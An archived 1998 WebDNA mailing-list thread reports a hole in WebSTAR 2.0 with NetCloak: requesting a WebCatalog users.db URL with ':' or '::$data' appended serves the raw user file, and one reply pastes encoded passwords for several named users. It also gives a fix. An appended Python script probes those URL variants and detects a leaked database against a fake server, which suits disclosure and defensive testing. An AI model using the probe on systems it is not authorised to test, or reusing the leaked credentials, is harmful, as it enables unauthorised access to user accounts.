Re: Major Security Hole
This WebDNA talk-list message is from 1998 (message 18825). It keeps the original formatting.

Dan,

Yours appear to be encrypted.

Paul

>Oh crap! I get something similar. I can see all of my groups and user
>names but the passwords appear as a string of weird characters. Now I
>don't know if the characters can be interpreted or if it is just garbage.
>I would prefer that nothing gets returned.
>
>I get the user group text string returned if I request:
>
>http://www.server.com/webcatalog/users.db::$data
>
>I also get the text string returned if I only request:
>
>http://www.server.com/webcatalog/users.db:
>
>
>Here is the complete string that gets returned:
>user pass groups ADMIN m&%22#022#!#027#h ADMIN UPDATEDONE
>ZcMNv#027#TEIh DAN TRYON -e%2C #004#Tw{ ADMIN,RSKILLS,CESD
>GEOFF FULLER
>*QKV#031##026#u#%00 RSKILLS,CESD CARL HADSELL ]%22D7pFx 2̻M
>RSKILLS,CESD
>
>
>I run a Mac - WebSTAR 2.1 and NetCloak.
>I do NOT allow all WebCatalog commands!
>
>
>dan t.
>
>
>>I thought that the $ was the problem too at first. But then it worked
>>with just a single :
>>
>>It worked on .db files which allowed ANYONE to find and look at our
>>users.db file. OUCH!
>>
>>I tried to do the same thing on the Pacific-Coast server and that of
>>several others that I know run WebCat or Typhoon, including some of our
>>other servers here. It only was valid in the one instance on this machine
>>that we were still running WebSTAR 2.0 on along with NetCloak. I upgraded
>>WebSTAR to 2.1 and deleted NetCloak.
>>
>>Problem solved. But I sure was in a panic when I could type
>>http://secure.ims1.com/webcatalog/users.db::$data and get a complete list
>>of users, passwords and groups!
>>
>>Anyone who is still using WebSTAR 2.0, NetCloak and WebCatalog 2.0 on a
>>Macintosh should be made aware that their setup may not be secure. People
>>can get your admin passwords and then track down any credit card numbers
>>from online stores. I am not sure if this is a problem with WebSTAR or
>>NetCloak, but I am sure that the problem is real and it does not exist with
>>NetCloak removed and WebSTAR updated to 2.1 or greater.
>>
>>Thanks, Paul
>>
>> _/_/_/_/_/_/_/_/_/_/_/_/|\_\_\_\_\_\_\_\_\_\_\_\_
>> _/_/_/Paul Uttermohlen, Internet Marketspace, Inc. \_\_\_\_
>> _/_/_/ mailto:paul@ims1.com - Website Development \_\_\_\_
>> _/_/_/ Business - _\_\_\_\_\_\_\_\_\_\_
>> _/_/_/ Real Estate - _\_\_\_\_
>> _/_/_/Websites - Children _/ _\_\_\_
>>_/_/_/_/_/_/_/_/_/_/_/_/_/_/ | \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

 _/_/_/_/_/_/_/_/_/_/_/_/|\_\_\_\_\_\_\_\_\_\_\_\_
 _/_/_/Paul Uttermohlen, Internet Marketspace, Inc. \_\_\_\_
 _/_/_/ mailto:paul@ims1.com - Website Development \_\_\_\_
 _/_/_/ Business - _\_\_\_\_\_\_\_\_\_\_
 _/_/_/ Real Estate - _\_\_\_\_
 _/_/_/Websites - Children _/ _\_\_\_
_/_/_/_/_/_/_/_/_/_/_/_/_/_/ | \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Paul Uttermohlen
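The probe the thread describes, written up as an added example that is not part of the original message or of WebCatalog itself: it builds the URL variants Paul and Dan report (the bare path, a trailing `:`, and `::$data`) and flags a response that reads as a raw users database instead of a rendered page. The fake server responses, the tab delimiting, the `user`/`pass`/`groups` header names and the `fetch` callable are all constructed assumptions; swap `fake_fetch` for a real HTTP GET only against a server you are authorised to test.

```python
"""Offline check for the WebCatalog .db exposure discussed in the thread.

Assumptions (not from the original message): the vulnerable server returns
the database file verbatim, the file is tab-delimited with a header row,
and the bypass suffixes are exactly the two forms reported (":" and "::$data").
"""
from urllib.parse import urlsplit, urlunsplit

# Path suffixes the thread reports as causing the raw .db file to be served.
PROBE_SUFFIXES = ("", ":", "::$data")

# Header columns that identify a WebCatalog users database (assumed names,
# taken from the "user pass groups" line Dan pasted).
SENSITIVE_COLUMNS = {"user", "pass", "groups"}


def probe_urls(db_url: str) -> list[str]:
    """Return the base URL plus each suffixed variant, in the order to try."""
    parts = urlsplit(db_url)
    return [urlunsplit(parts._replace(path=parts.path + s)) for s in PROBE_SUFFIXES]


def looks_like_db_dump(body: str) -> bool:
    """True if the body reads as a raw tab-delimited users database.

    A header row naming user/pass/groups followed by at least one record is
    treated as a leak; a header alone or a rendered HTML page is not.
    """
    lines = [ln for ln in body.splitlines() if ln.strip()]
    if not lines:
        return False
    header = [col.strip().lower() for col in lines[0].split("\t")]
    return SENSITIVE_COLUMNS.issubset(header) and len(lines) > 1


def check_exposure(db_url: str, fetch) -> dict[str, bool]:
    """Fetch every probe variant with `fetch(url) -> str`; map URL -> leaked?"""
    return {url: looks_like_db_dump(fetch(url)) for url in probe_urls(db_url)}


# Constructed sample responses standing in for the vulnerable server.
LEAKED_DB = (
    "user\tpass\tgroups\n"
    "ADMIN\tm&%22#022#!#027#h\tADMIN\n"
    "DAN TRYON\t-e%2C #004#Tw{\tADMIN,RSKILLS,CESD\n"
)
RENDERED_PAGE = "<html><body>Access denied</body></html>\n"

FAKE_SERVER = {
    "http://www.server.com/webcatalog/users.db": RENDERED_PAGE,
    "http://www.server.com/webcatalog/users.db:": LEAKED_DB,
    "http://www.server.com/webcatalog/users.db::$data": LEAKED_DB,
}


def fake_fetch(url: str) -> str:
    """Stand-in for an HTTP GET; unknown URLs behave like the patched server."""
    return FAKE_SERVER.get(url, RENDERED_PAGE)


if __name__ == "__main__":
    results = check_exposure("http://www.server.com/webcatalog/users.db", fake_fetch)
    for url, leaked in results.items():
        print(("LEAK " if leaked else "ok   ") + url)
```

The classifier keys on the header row rather than on the literal password strings, so it also catches a leak on a server whose `pass` column is stored differently from the `#NNN#`-encoded values in Dan's paste.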